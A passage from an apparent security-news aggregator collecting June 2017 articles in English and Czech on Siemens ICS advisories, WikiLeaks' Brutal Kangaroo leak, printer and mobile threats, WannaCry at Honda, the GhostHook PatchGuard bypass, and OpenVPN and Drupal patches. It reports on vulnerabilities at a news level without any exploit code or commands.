"No company is immune from cybercrime. No customer data was accessed, and we're confident in the integrity of our software and systems. We have comprehensive measures in place to prevent, detect, and respond to attacks."
SEROCU officials said they are working with Europol, the NCA's National Cyber Crime Unit, the FBI, the East Midlands Special Operations Unit (EMSOU), and Microsoft's cyber team to investigate the intrusions and bring culprits to justice.


Siemens Patches Flaws in SIMATIC, XHQ Products

23.6.2017 securityweek Vulnerebility
Siemens and ICS-CERT published advisories this week to alert users of improper authentication and privilege escalation vulnerabilities affecting some SIMATIC and XHQ products.

The SIMATIC communication processor (CP) of the Redundant Network Access (RNA) series, which is designed for connecting S7-400 CPUs to industrial ethernet, is affected by a critical vulnerability that allows a remote, unauthenticated attacker to perform administrative actions on a device.

The security hole, tracked as CVE-2017-6868, affects the SIMATIC CP 44x-1 RNA modules running versions prior to 1.4.1. The flaw can only be exploited if the attacker has network access to TCP port 102 and the processor’s configuration is stored on the corresponding CPU.

In a separate advisory, ICS-CERT and Siemens described a medium severity privilege escalation flaw (CVE-2017-6866) affecting the XHQ automation software, which helps organizations improve enterprise performance by providing and aggregating operational and business data.

The vulnerability affects XHQ 4 versions prior to 4.7.1.3 and XHQ 5 versions prior to 5.0.0.2, and it can be exploited by an authenticated attacker with low privileges to read data they should not be allowed to access.

In the past weeks, Siemens released security updates for several of its products, including SINUMERIK automation products, RUGGEDCOM appliances, and SIMATIC and SCALANCE industrial products.

The company also alerted customers last month that many of its medical devices had been exposed to attacks due to the use of the SMB1 protocol, which the WannaCry ransomware exploited in recent attacks. Siemens updated many of its advisories this month to inform users about the availability of patches.


WikiLeaks Details CIA's Air-Gapped Network Hacking Tool

23.6.2017 securityweek  BigBrothers
WikiLeaks published several documents on Thursday detailing a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to hack air-gapped networks through USB drives.

Dubbed “Brutal Kangaroo,” it has been described by its developer as a tool suite designed for targeting closed networks. The infected systems will form a covert network, and the attacker will be able to obtain information and execute arbitrary files.

One component of Brutal Kangaroo is called “Shattered Assurance” and it’s designed to automatically spread the tool to USB drives connected to a device within the targeted organization that was infected remotely via the Internet. Shattered Assurance relies on a tool named “Drifting Deadline” to infect thumb drives.

Once the victim connects the infected drive to an air-gapped network and Brutal Kangaroo is deployed, a component named “Broken Promise” is used to evaluate the harvested data. The last component, dubbed “Shadow,” acts as the primary persistence mechanism and command and control (C&C) server on the closed network.

The documents published by WikiLeaks show that Drifting Deadline and Shattered Assurance replaced two previous tools named “EZCheese” and “Emotional Simian.”

Brutal Kangaroo

Brutal Kangaroo infects USB drives by exploiting Windows vulnerabilities that allow an attacker to execute arbitrary DLL files using specially crafted shortcut (LNK) files. At least some of the exploits do not require users to actually run the malicious files.

Earlier versions of EZCheese leveraged a Windows vulnerability (CVE-2015-0096) discovered and patched in 2015. The flaw is a newer variant of CVE-2010-2568, which the notorious Stuxnet worm used in attacks aimed at Iran’s nuclear program.

One exploit used in later versions, dubbed “Lachesis” and designed for Windows 7, relies on autorun.inf to execute the malicious file as soon as the thumb drive is plugged in. Another exploit, named “RiverJack” and designed for Windows 7, 8 and 8.1, leverages library-ms functionality.

Microsoft said the vulnerabilities used by these exploits have already been patched in supported versions of Windows, but it’s unclear when. The company this month patched a LNK remote code execution flaw (CVE-2017-8464) that has been actively exploited, but no information has been provided on these attacks.

While the exploits may have been successful in some cases, the Brutal Kangaroo documents show that security products from Symantec, Avira, Avast, Bitdefender and Kaspersky did block at least some functionality and attack vectors.

WikiLeaks has been publishing CIA files, which are part of a leak dubbed “Vault 7,” nearly every week since March 23. The tools exposed by the whistleblower organization include ones designed for replacing legitimate files with malware, hacking Samsung smart TVs and routers, MitM tools, a framework used to make malware attribution and analysis more difficult, and a platform for creating custom malware installers.

Security firms have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


Periferie: málo chráněná zařízení v zabezpečení firmy

23.6.2017 SecurityWorld Zabezpečení
V roce 2015 dosahoval dle IDC objem dat přibližně 8,5 ZB. Celkové množství dat v roce 2020 dosáhne 40 ZB. V tuto dobu bude používáno 25 miliard připojených zařízení (v roce 2015 to bylo 4,9 miliardy). V souvislosti s nárůstem objemu dat a počtu klientů také vzniká více příležitostí pro kybernetické zločince, kteří útočí na nechráněné nebo nedostatečně chráněné koncové body. V roce 2014 nahlásily firmy 48% roční nárůst počtu kybernetických útoků na jejich sítě a tento počet dál roste.

Nicméně dle nedávné studie společnosti Spiceworks odpovědělo pouze 18 % dotazovaných odborníků na IT, že tiskárny považují za středně vysoké nebo vysoké bezpečnostní riziko. A pouhých 16 % dotazovaných odborníků na IT chrání tiskárny také pomocí bezpečnostních certifikátů!

„Přes tiskárny kombinované se skenery procházejí všechny důležité firemní dokumenty, včetně strategií, smluv, ceníků a často i osobních dokladů. Během více než 20 let každodenního využívání se staly z hlediska kyberbezpečnosti jedním z nejrizikovějších zařízení. Slouží jako brána do zabezpečené podnikové sítě nebo na dálku ovládaný zdroj kybernetických útoků. Kvůli minimálnímu zabezpečení jsou totiž snadným cílem hackerů,“ říká expert na kybernetickou bezpečnost Martin Půlpán.

Multifunkční zařízení HP se v síti chovají v podstatě jako počítač. Odesílají, přijímají a uchovávají data, potřebná k tisku. Zaslouží si proto stejně důkladnou ochranu jako počítače a servery ve stejné síti.

Nezabezpečená tisková zařízení mohou být zranitelná mnoha způsoby. Přes síť - tiskové a zobrazovací úlohy mohou být zachyceny při síťovém přenosu do zařízení nebo z něj. BIOS a firmware – firmware, který je při startu nebo za běhu pozměněn, může zařízení a síť vystavit útokům. Paměťová média – zobrazovací a tisková zařízení ukládají citlivé údaje na interní pevné disky, na které se bez ochrany dá proniknout.

Data uložená v zařízeních by měla být zašifrovaná. Řada starších zařízení ale nemá nainstalováno šifrované úložiště nebo ho nedokáže používat. Pevné disky a soubory je třeba pravidelně mazat. Dělá to však málokdo.

Nezabezpečená zařízení mohou být ohrožena i dalšími způsoby. Například prostřednictvím ovládacího panelu, zachycováním dat, přes vstupní a výstupní zásobník apod.

Společnost HP proto nabízí ve svých nových multifunkční podnikových tiskárnách komplexní sadu bezpečnostních prvků, které mají za úkol chránit zařízení, data i dokumenty a vytvořit několikavrstvý přístup k zabezpečení, který je nezbytný při boji se současnými pokročilými útoky.

Mezi bezpečnostní funkce patří například HP Sure Start pro ověření integrity kódu systému BIOS, detekce neioprávněného vniknutí, HP JetAdvantage Security Manager, pro správu zabezpečení tisku (automaticky vyhodnocuje a v případě nutnosti opravuje bezpečnostní nastavení zařízení v souladu s předem stanovenými firemními pravidly), ověřování identifikace, šifrování, automatické sledování útoků, integrace systémů SIEM apod.


Mobilní zařízení a různé typy útoků a rizik

23.6.2017 SecurityWorld Mobilní
Smartphony a tablety nám poskytují snadný přístup ke kritickým podnikovým informacím, systémům a funkcím. Umožňují nám tak pracovat rychleji, přesněji a často v režimu 24x7. Poskytnout zaměstnancům přístup z mobilních telefonů má mnoho výhod, přináší ale také nová rizika.

Samotná mobilní zařízení, sítě, k nimž se připojují, a aplikace, které na nich běží – to všechno může být zneužito ke krádeži citlivých dat, jako jsou dokumenty, kontaktní informace, schůzky v kalendáři, emailové zprávy atd. Útočníci mohou na vašem mobilu kvůli odposlechu vašich jednání zneužít mikrofon a kameru. Při přihlášení uživatele do podnikového systému obsahující citlivá data pak mohou zachytit veškerá jména a hesla. Nedostatečně zabezpečené sítě útočníkům umožňují odposlouchávat, podvrhávat, nebo i měnit zasílaná data. Podvodné aplikace jim potom mohou poskytnout neomezený přístup k mobilům, vašim datům i síti.

Přesná detekce všech moderních útoků a jejich rychlé a účinné blokování jsou kriticky důležité pro efektivní ochranu. Klasické antiviry a další signaturní a reputační nástroje sice mohou detekovat tradiční známé hrozby, ale nemohou účinně odhalit nově vytvořený malware nebo zranitelnosti v sítích, operačních systémech a mobilních aplikacích.
Jaké jsou cíle útočníků?

Útoky na mobilní zařízení a komunikace závratně rostou. Mobilní útočníci rychle přejímají fungující typy útoků z „klasického“ (počítačového/síťového) světa, adaptují je na mobilní prostředí, a často tak přicházejí s úplně novými typy hrozeb. Jejich konečnými cílem může být například odposlech a špionáž citlivých informací (pomocí ovládnutí mikrofonu či kamery) nebo odposlech přenášených informací v mobilních sítích. Dále jim jde o přístup do podnikových systémů přes mobilní zařízení uživatele. V neposlední řadě pak o krádež dat, nebo jejich zničení, zašifrování, které bude v budoucnu v souvislosti s růstem útoků pomocí tzv. mobilního ransomware čím dál častější.
Jaké je dnes vnímání mobilních rizik?

Velká část firem si dnes není jistá, že je schopna bránit se mobilním kybernetickým útokům, přitom naprostá většina – cca 94 % z nich – očekává nárůst tohoto typu hrozeb. Množství mobilních hrozeb narostlo za poslední tři roky více než pětkrát. Začátkem roku 2017 např. existovalo již více než 2,5 milionu známých variant mobilního malwaru.
Jaké jsou moderní typy mobilních útoků?

Moderní útoky na mobilní platformy můžeme rozdělit do několika skupin. Za prvé jde o zneužití zranitelností mobilních operačních systémů, dále o útoky pomocí malwaru a podvodných aplikací a útoky na síťovou komunikaci (tzv. Man In the Middle).

Podvodné mobilní aplikace mohou zcela ovládnout naše zařízení. Umí si podmanit mikrofon a kameru, provést odposlech a nahrát veškeré naše rozhovory, odchytávat pohyby na klávesnici, krást přístupová hesla atd. Rozpoznání podvodné aplikace samotným uživatelem přitom není vůbec jednoduché. Uživatelé často nevěnují pozornost tomu, jaká práva o nich aplikace vůbec získává, případně tomu dostatečně nerozumí. Dokonce i známé aplikace mohou být útočníkem upraveny a publikovány na aplikačním tržišti.

Další typy útoků, tzv. MiTM (Man-in-the-Middle), mohou odposlouchávat, přerušovat, nebo měnit komunikaci mezi mobilem a přístupovým bodem. Můžete být přesvědčeni, že komunikujete se známým a důvěryhodným protějškem, i přesto ale útočník může kopírovat vaše hesla, odposlouchávat zprávyi krást citlivé informace. Nejsnadnějším místem pro ně jsou přitom veřejné WiFihotspoty.
A jaké jsou možnosti ochrany?

Obecně vzato lze možnosti řešení bezpečnosti mobilních zařízení rozdělit do tří hlavních skupin:

- Základní vlastnosti platforem – operačních systémů (např. Android nebo iOS)

- řešení typu EMM/MDM
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

- řešení typu MTD

Základní vlastnosti platforem operačních systémů Android nebo iOS přinášejí ve svých nejnovějších verzích řadu nových funkcí pro zlepšení bezpečnosti zejména při jejich využití v podnikovém prostředí. Obě platformy např. nabízejí určitý způsob segmentace dat ve firemním a soukromém profilu a umožňují vytvořit zabezpečený kontejner pro instalaci korporátních aplikací. Vylepšení se dočkalo také zabezpečení dat při přenosu. Důležité však je si uvědomit, že ani jedna platforma vás sama o sobě před moderními mobilními hrozbami neochrání. Obě dvě mají celou řadu zranitelností, jsou náchylné pro spuštění mobilního malwaru a podvodných aplikací a pro síťové útoky přes MiTM.

Kromě těch nejzákladnějších bezpečnostních opatření na úrovni operačního systému doporučujeme využít také systémy EMM/MDM a zároveň nástroje typu MTD pro detekci a blokaci moderních mobilních útoků. Pro zajištění bezpečnosti mobilních zařízení ve firemním prostředí můžete využít nástroje centrální správy, nazývané také zkratkou MDM (Mobile Device Management), nebo EMM (Enterprise Mobility Management). EMM nebo MDM řešení většinou nabízí z hlediska bezpečnosti celou řadu funkcí, například omezení přístupu uživatele a aplikací k HW (kamera, GPS, USB rozhraní a další) i ke službám OS. Dálenabízí třeba šifrování přenášených i uložených dat, vymazání zařízení při ztrátěi silnější autentizaci.
Moderní bezpečnostní nástroje kategorie MTD

V reakci na prudký vývoj nových typů útoků vznikla během poslední doby také celá řada nových bezpečnostních nástrojů, které se dnes nazývají jako MTD (Mobile Threat Defense). MTD řešení detekuje aplikace, které jsou staženy do zařízení, provádí jejich emulaci ve virtuálním prostředí a analyzuje jejich chování před tím, než jsou schválené nebo označené jako škodlivé. Díky tomu můžete včas identifikovat podezřelé nebo škodlivé aplikace, které Vaši zaměstnanci používají.

Veřejná místa jsou plná otevřených sítí Wi-Fi, tudíž je obtížné zjistit, které sítě jsou bezpečné a které ne. Počítačoví zločinci mohou těchto sítí využít pro kompromitaci komunikace smartphonů a tabletů, ovládnout tato zařízení a získávat cenná data, jako jsou zprávy, soubory a přístupové údaje. MTD pak dokáže rozpoznat škodlivé síťové chování a automaticky deaktivuje podezřelé sítě pro ochranu vašich zařízení a dat.

V neposlední řadě zločinci často zneužívají zranitelnosti operačních systémů a aplikací. MTD řešení neustále analyzuje zařízení pro odhalení zranitelností a detekuje chování, které počítačoví zločinci mohou použít k útoku na zařízení a krádeži citlivých informací.

Moderní bezpečnostní nástroje kategorie MTD vám tak mohou poskytnout veškeré vlastnosti nutné pro zabezpečení vašich mobilních dat. Analyzují podezřelé aplikace, upozorňují na ty škodlivé a doporučují jejich odstranění. Dále chrání mobilní zařízení před přístupem k nebezpečným sítím Wi-Fi a před MiTM („Man-in-The-Middle“) útoky (např. SSL Interception - Bump, SSL Stripping, „Superfish“ a další), umožňují zablokovat přístup k podnikové síti, pokud je na mobilním zařízení detekována hrozba, a díky technologiím emulace umí rozpoznat známé i neznámé hrozby. Odhalí také útoky na zranitelnosti, změny v konfiguracích a pokročilý rooting a jailbreaking.

Kybernetické útoky na mobilní zařízení raketově rostou, společně s nárůstem jejich využití a kritičností. Větší možnosti připojení prakticky odkudkoliv a jejich nedostatečné zabezpečení z nich dělá snadné terče pro různé typy hrozeb. Toto riziko je nutné si plně uvědomit a začít jej řešit.


Vyděračský virus napadl továrnu Hondy

23.6.2017 Novinky/Bezpečnost Viry
V posledních týdnech nebylo o vyděračském viru WannaCry takřka slyšet. To ale neznamená, že by se i nadále nešířil internetem, právě naopak. Tomuto nezvanému návštěvníkovi se dokonce podařilo zavirovat důležité systémy v jedné japonské továrně automobilky Honda. Ta tak musela být uzavřena.
WannaCry útočil v polovině minulého měsíce. Tehdy zvládnul za pouhých pár hodin infikovat více než 300 000 počítačů ve 150 zemích světa.

Pak se po něm doslova slehla zem, kvůli čemuž patrně někteří uživatelé nabyli falešného pocitu bezpečí. Rozhodně to platí i o bezpečnostních expertech, kteří měli na starosti počítačové systémy v japonské Hondě.

Minulý týden se tak systémy této automobilky staly obětí právě vyděračského viru WannaCry. A to i přesto, že obrana před ním je relativně jednoduchá – stačí nainstalovat aktualizaci, která vstupu tohoto nezvaného návštěvníka do Windows zamezí.

Továrna ve městě Sayama, která jinak produkuje na tisícovku aut denně, tak musela být na několik dní odstavena.

Jak připomněl server Cnet, s vyděračským virem WannaCry má nepříjemné zkušenosti i další automobilka. Útok totiž již dříve postihl společný podnik Renault-Nissan. Tento koncern tak byl na čas nucen zastavit produkci například v Japonsku či Indii.

Jak probíhá útok viru WannaCry
WannaCry – první i vylepšená druhá generace – útočí úplně stejně jako ostatní vyděračské viry, které jsou označovány souhrnným názvem ransomware. Nejprve tedy škodlivý kód pronikne do počítače, pak jej uzamkne a zašifruje všechna data. Za jejich zpřístupnění následně počítačoví piráti požadují výkupné.

Je však nutné zdůraznit, že ani po zaplacení výkupného uživatelé nemají jistotu, že se k datům dostanou.

WannaCry se začal internetem šířit v polovině května. Za pouhých pár hodin stihl nakazit více než 300 000 počítačů ve více než 150 zemích světa. Takřka polovina všech zachycených detekcí (45,07 %) připadá na Rusko. Je to dáno tím, že především v tamních chudých lokalitách ještě uživatelé hojně používají zastaralý operační systém Windows XP, který byl vůči škodlivému kódu WannaCry nejvíce zranitelný.

Druhou a třetí příčku pak zaujaly Ukrajina (11,88 %) a Tchaj-wan (11,55 %). Ostatní státy, které se dostaly v žebříčku nejpostiženějších zemí do první desítky, měly podíl tak v řádech jednotek procent. Šlo například o Egypt, Indii či Filipíny.

Česká republika zasažena jen okrajově
Česká republika skončila v přehledu s podílem 0,15 % až na 52. místě. Sluší se nicméně podotknout, že spodní příčky měly velmi podobný podíl až prakticky do konce žebříčku, který obsahovat 150 států. Například sousední Slovensko ale na tom bylo hůře – virus WannaCry tam měl podíl 0,26 %.

V Česku byly přitom infikovány stovky strojů. „Podle našich údajů počet infekcí překonal číslo 620,“ uvedl již dříve na dotaz Novinek Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ.


New GhostHook Attack Bypasses Windows 10 PatchGuard Protections
23.6.2017 thehackernews
Attack

Vulnerabilities discovered in Microsoft PatchGuard kernel protection could allow hackers to plant rootkits on computers running the company's latest and secure operating system, Windows 10.
Researchers at CyberArk Labs have developed a new attack technique which could allow hackers to completely bypass PatchGuard, and hook a malicious kernel code (rootkits) at the kernel level.
PatchGuard, or (or Kernel Patch Protection) is a software tool that has been designed to forbid the kernel of 64-bit versions of Windows OS from being patched, preventing hackers from running rootkits or executing malicious code at the kernel level.
Dubbed GhostHook, the attack is what the CyberArk Labs researchers call the first attack technique that thwarts the defensive technology to bypass PatchGuard, though it requires a hacker to already be present on a compromised system and running code in the kernel.
So, basically, this is a post-exploitation attack.
"[GhostHook] is neither an elevation nor an exploitation technique. This technique is intended for a post-exploitation scenario where the attacker has control over the asset," CyberArk researchers said.
"Since malicious kernel code (rootkits) often seeks to establish persistence in unfriendly territory, stealth technology plays a fundamental role."
Running Rootkit at Kernel-Level in Windows 10
An attack scenario would include using a hacking exploit or malware first to compromise a target machine and then deploy GhostHook to set up a permanent, secret presence on a compromised 64-bit Windows 10 PC.
Once compromised, an attacker can plant a rootkit in the kernel of the compromised machine, which would be completely undetectable to third-party antivirus and security products and invisible to Microsoft's PatchGuard itself.

CyberArk believes the issue may be extremely difficult for Microsoft to patch, as the technique uses hardware to gain control of critical kernel structures.
GhostHook Exploits Weakness Microsoft's Implementation of Intel PT
GhostHook attack bypasses PatchGuard by leveraging a weakness in Microsoft's implementation of a relatively new feature in Intel processors called Intel PT (Processor Trace), specifically at the point where Intel PT talks to the operating system.
Released months after PatchGuard, Intel PT enables security vendors to monitor and trace commands that are executed in the CPU in an attempt to identify exploits, malware or code before they reach the main operating system.
Although this technology can be abused for legitimate purposes, attackers can also take advantage of the "buffer-is-going-full notification mechanism" in order to take control of a thread’s execution.
"How can we achieve that with Intel PT? Allocate an extremely small buffer for the CPU’s PT packets," the researchers said. "This way, the CPU will quickly run out of buffer space and will jump the PMI handler. The PMI handler is a piece of code controlled by us and will perform the 'hook.'"
Hooking techniques, which have both harmless (like application security solutions, system utilities, and tools for programming), as well as malicious (like rootkits) purpose, can give hackers control over the way an operating system or a piece of software behaves.
Microsoft in No Mood to Release a Fix, at least Right Now
Microsoft did not consider GhostHook as a serious threat and told the security firm that the company does not think any emergency any patch is needed but may address in a future version of Windows.
"The engineering team has finished their analysis of this report and determined that it requires the attacker already be running kernel code on the system," said a Microsoft's spokesperson. "As such, this does not meet the bar for servicing in a security update however it may be addressed in a future version of Windows. As such I have closed this case."
In response to this report, Microsoft also released a statement, which reads:
"This technique requires that an attacker has already fully compromised the targeted system. We encourage our customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers."
However, CyberArk is disappointed with the company's response, saying Microsoft should realize that PatchGuard is a kernel component which, in any case, should not be bypassed.


Configuration Error Embarrasses UK's Cyber Essentials

23.6.2017 securityweek  Cyber
The UK government's Cyber Essentials scheme has suffered an embarrassing incident; but one that can hardly be called a breach and certainly not a cyber-attack. A configuration error in the underlying software platform exposed the email addresses of consultancies registered with the scheme -- nothing more.

Cyber Essentials is a UK government-backed certification scheme designed to encourage the adoption of good security practice. It includes five primary technical controls: boundary firewalls and internet gateways; secure configuration (ironically); access control; malware protection; and patch management.

Certification is provided by one of a number of certifying bodies licensed by an accreditation body (currently APMG, CREST, IASME, IRM security and QG).

"Since October 2014 Cyber Essentials has been mandatory for suppliers of Government contracts which involve handling personal information and providing some ICT products and services," explains the Cyber Essentials website. "Holding a Cyber Essentials badge enables you to bid for these contracts."

It seems that the configuration error briefly exposed the email addresses of registered consultancies seeking certification to allow bidding for such government contracts. This error has been fixed by the provider concerned, Pervade Software.

An email notification sent to the 'victims' by Dr Emma Philpott, chief executive at the IASME Consortium (which runs the accreditation of the scheme), stated, "We would like to make you aware that, due to a configuration error in the Pervade Software platform we use for Cyber Essentials assessments, the email address you used to apply for an assessment and your company name may have been released to a third party."

The NCA and Information Commissioner's Office have, as standard practice, been notified; but the scheme doesn't consider it worth a comment on its site. "We would like to make it clear that the security of the assessment platform has not been compromised," continues the statement. "Your account, the answers you provided in the assessment and the report you received are secure. No information other than your email address and your company name was accessible to the third party."

When email addresses are publicly exposed, the primary concern is over an increased likelihood of phishing attacks. This doesn't appear to be a major problem with this incident. "In light of the recent breaches exposing billions of records containing extremely sensitive information, I would not call this particular incident a 'breach'," commented Ilia Kolochenko, CEO of High-Tech Bridge. "Indeed, it can facilitate phishing attacks against the companies whose emails addresses were exposed; however virtually all this data can be gathered from public sources, albeit over a much longer period of time.

“Such incidents are quite hard to avoid unfortunately, moreover, due to lack of resources, many governmental websites have much more dangerous vulnerabilities that remain undetected for years. Practically speaking and due to the nature of the CES accreditation, all the companies from the list should have capabilities to detect and mitigate phishing attacks. Additional vigilance would certainly not harm, though."

It is, in short, a storm in a teacup that is more of an embarrassment to a government security scheme than a danger to the exposed. Nevertheless, it serves to highlight the diligence needed to prevent configuration errors in third-party supplied software -- it could have been much worse.


OpenVPN fixed several remotely exploitable flaws that were not detected by recent audits
23.6.2017 securityaffairs
Vulnerebility
OpenVPN fixed several vulnerabilities that could be exploited by remote attackers, the flaws were not detected in a recent audit.
Recently two distinct audits were conducted to discover security issues in the OpenVPN, many flaws were found but some vulnerabilities were not spotted by the experts.

Four of the vulnerabilities in OpenVPN 2.4.2, were found by the researcher Guido Vranken, they were fixed in the OpenVPN 2.4.3 and OpenVPN 2.3.17 releases.

The CVE-2017-7508 vulnerability is the most severe issue, it is a Remotely-triggerable ASSERT() on malformed IPv6 packet bug that can be exploited to remotely shut down an OpenVPN server or client. The vulnerability is exploitable when the triggered if IPv6 and –mssfix are enabled and only if the IPv6 networks used inside the VPN are known.

The second flaw found by the expert, tracked as CVE-2017-7521, is caused by the code that doesn’t free all allocated memory when using the –x509-alt-username option on OpenSSL builds with an extension (argument prefixed with “ext:”).

“Several of our OpenSSL-specific certificate-parsing code paths did not always clear all allocated memory. Since a client can cause a few bytes of memory to be leaked for each connection attempt, a client can cause a server to run out of memory and thereby kill the server. That makes this a (quite inefficient) DoS attack.” states the advisory.

“In particular when using the –x509-alt-username option on openssl builds with an extension (argument prefixed with “ext:”, e.g. “ext:subjectAltName”), the code would not free all allocated memory.”

openVPN

The third issue, tracked as CVE-2017-7521, was a potential double-free in –x509-alt-username. The vulnerability is exploitable on configurations that use the –x509-alt-username option with an x509 extension.

“OpenVPN did not check the return value of ASN1_STRING_to_UTF8() in extract_x509_extension(). Ignoring such a failure could result in buf being free’d twice. An error in ASN1_STRING_to_UTF8() can be caused remotely if the peer can make the local process run out of memory.” reads the advisory.

“The problem can only be triggered for configurations that use the –x509-alt-username option with an x509 extension (i.e. the option parameter starts with “ext:”).”

A fourth vulnerability, tracked as CVE-2017-7522, was a post-authentication remote DoS when using the –x509-track option.

“asn1_buf_to_c_string() returned a literal string if the input ASN.1 string contained a NUL character, while the caller expects a mutable string. The caller will attempt to change this string, which allows a client to crash a server by sending a certificate with an embedded NUL character.” continues the advisory. “The other way around is not interesting, as servers are allowed to stop a client by design.”

OpenVPN also fixed other bugs, such as the a pre-authentication remote crash/information disclosure for clients tracked as CVE-2017-7520.


Drupal fixes the CVE-2017-6922 flaw exploited in spam campaigns in the wild
23.6.2017 securityaffairs 
Vulnerebility

Drupal team released security updates to fix several vulnerabilities, including the critical access bypass flaw CVE-2017-6922 exploited in spam campaigns.
The Drupal development team has released security updates to fix several vulnerabilities, including the critical access bypass flaw tracked as CVE-2017-6922 that has been exploited in spam campaigns.

The CVE-2017-6922 flaw was fixed with the release of Drupal versions 7.56 and 8.3.4.

Drupal Security Team was observing a trend of attacks utilizing a site misconfiguration affecting all websites that allow file uploads by non-trusted or anonymous visitors, and stores the uploaded files in a public file system.

The files uploaded by the users are publicly accessible allowing anyone on the internet to access them. The site could be used by an attacker to host content that the legitimate site maintainers would not want made publicly available through their site.

“The majority of the reports are based around the webform module, however, other modules are vulnerable to this misconfiguration as well.” states the security advisory.

“For example, if a webform configured to allow anonymous visitors to upload an image into the public file system, that image would then be accessible by anyone on the internet. The site could be used by an attacker to host images and other files that the legitimate site maintainers would not want made publicly available through their site.”

Drupal is aware of attacks in the wild exploiting the flaw since October 2016, the new releases will not prevent such kind of abuses.

CVE-2017-6922 drupal

Drupal 8.3.4 also fixed a critical flaw, tracked as CVE-2017-6920, related to how the PECL YAML parser handles unsafe objects, the flaw could be exploited by an attacker for remote code execution.

Drupal also fixed in Drupal 8 is the improper field validation vulnerability tracked as CVE-2017-6921.

“A site is only affected by this if the site has the RESTful Web Services (rest) module enabled, the file REST resource is enabled and allows PATCH requests, and an attacker can get or register a user account on the site with permissions to upload files and to modify the file resource,” reads the advisory.

In April 2017, security experts discovered a critical vulnerability that affects the Drupal References module that is used by hundreds of thousands of websites using the popular CMS.

The Drupal team published a Security advisory on April 12 informing its users of the critical flaw.

The flaw has a huge impact on the Drupal community because the affected module is currently used by more than 121,000 websites.

“The module is currently used by over 120 000 individual Drupal installations, but is no longer maintained. The last update was done in February 2013. Unfortunately, a critical security vulnerability in this references module has been reported by the Drupal core security team as SA-CONTRIB-2017-38:

The module had no longer been supported, fortunately, a new maintainer addressed the flaw.


OpenVPN Patches Remotely Exploitable Vulnerabilities

22.6.2017 securityweek Vulnerebility
OpenVPN this week patched several vulnerabilities impacting various branches, including flaws that could be exploited remotely.

Four of the bugs were found by researcher Guido Vranken through fuzzing, after recent audits found a single severe bug in OpenVPN. While analyzing OpenVPN 2.4.2, the researcher found and reported four security issues that were addressed in the OpenVPN 2.4.3 and OpenVPN 2.3.17 releases this week.

The most important of the four issues is a Remotely-triggerable ASSERT() on malformed IPv6 packet bug that can be exploited to remotely shutdown an OpenVPN server or client. Tracked as CVE-2017-7508, the bug can be triggered if IPv6 and --mssfix are enabled and only if the IPv6 networks used inside the VPN are known.

Tracked as CVE-2017-7521, a second vulnerability involves remote-triggerable memory leaks. The issue is that the code doesn’t free all allocated memory when using the --x509-alt-username option on OpenSSL builds with an extension (argument prefixed with "ext:").

“Several of our OpenSSL-specific certificate-parsing code paths did not always clear all allocated memory. Since a client can cause a few bytes of memory to be leaked for each connection attempt, a client can cause a server to run out of memory and thereby kill the server. That makes this a (quite inefficient) DoS attack,” OpenVPN explains in an advisory.

The third vulnerability Guido Vranken discovered was a potential double-free in --x509-alt-username, tracked as CVE-2017-7521. The bug can be triggered only on configurations that use the --x509-alt-username option with an x509 extension, and this function is very unlikely to fail in real-world usage for other reasons than memory exhaustion, the researcher discovered.

The fourth issue found by Vranken was a post-authentication remote DoS when using the --x509-track option. Tracked as CVE-2017-7522, the vulnerability resides in asn1_buf_to_c_string() returning a literal string not a mutable one, when the input ASN.1 string contains a NUL character. When the caller attempts to change this string, the client can crash a server by sending a certificate with an embedded NUL character.

Another security bug resolved in OpenVPN this week was a pre-authentication remote crash/information disclosure for clients. Tracked as CVE-2017-7520, the issue could allow a man-in-the-middle attacker between the client and the proxy to crash or disclose at most 96 bytes of stack memory (likely containing the proxy password).

The vulnerability can be triggered only on clients that use a HTTP proxy with NTLM authentication and is unlikely to compromise the security of the OpenVPN tunnel itself if the password isn’t reused. Clients that don’t use the --http-proxy option with ntlm2 authentication are not affected.

OpenVPN also resolved a null-pointer dereference in establish_http_proxy_passthru(), where the client could crash “if the peer did not specify the 'realm' and/or 'nonce' values. These pointers are dereferenced in DigestCalcHA1() and DigestCalcResponse?(); hence, if not set, a null-pointer dereference would occur.”


Microsoft Extends Edge Bounty Program Indefinitely

22.6.2017 securityweek Safety
Microsoft this week announced that the Edge Web Platform bounty program launched for Windows Insider Preview (WIP) last year has been extended indefinitely.

The program was launched on August 4, 2016, and Microsoft says that it has already paid over $200,000 in bounties over the ten-month period.

Because the program helped it make significant improvements to Edge’s security, the technology giant decided to extend the program indefinitely.

“Keeping in line with our philosophy of protecting customers and proactively partnering with researchers, today we are changing the Edge on Windows Insider Preview (WIP) bounty program from a time bound to a sustained bounty program,” Akila Srinivasan, Microsoft Security Response Center, announced.

The Edge Web Platform bounty on WIP was launched to determine researchers to report remote code execution (RCE), same origin policy bypass vulnerabilities (such as UXSS), and referrer spoofing bugs in the browser.

Moving forth, the company will continue to accept critical remote code execution and important design issues that could result in a customer’s privacy and security being compromised.

The program will continue indefinitely on Microsoft’s discretion, and reporting researchers can earn bounty payouts ranging from $500 to $15,000, depending on the severity of the reported vulnerability.

According to Microsoft, researchers who report qualifying vulnerabilities already found internally by Microsoft are eligible for a bounty of maximum $1,500 (only the first reporter receives the payout).

To qualify for the bounty program, vulnerabilities must be reproducible on the latest Windows Insider Preview (slow track), Srinivasan says.

Interested researchers are required to report Microsoft Edge browser security bugs to secure@microsoft.com via Coordinated Vulnerability Disclosure (CVD) policy.

For information on the Microsoft Bounty Programs, researchers should refer to this page on the company’s Security TechCenter website, and to the associated terms and FAQs.


No, WannaCry Is Not Dead! Hits Honda & Traffic Light Camera System
22.6.2017 thehackernews 
Ransomware
It's been over a month since the WannaCry ransomware caused chaos worldwide and people have started counting its name as 'the things of past,' but…
...WannaCry is not DEAD!
The self-spreading ransomware is still alive and is working absolutely fine.
The latest victims of WannaCry are Honda Motor Company and 55 speed and traffic light cameras in Australia.
The WannaCry ransomware shuts down hospitals, telecom providers, and many businesses worldwide, infecting over 300,000 Windows systems running SMBv1 in more than 150 countries within just 72 hours on 12th of May.
The worm was leveraging an NSA's Windows SMB exploit, dubbed EternalBlue, leaked by the infamous hacking group Shadow Brokers in its April data dump, along with other Windows exploits.
Honda Stops Production After WannaCry Hits its Computer
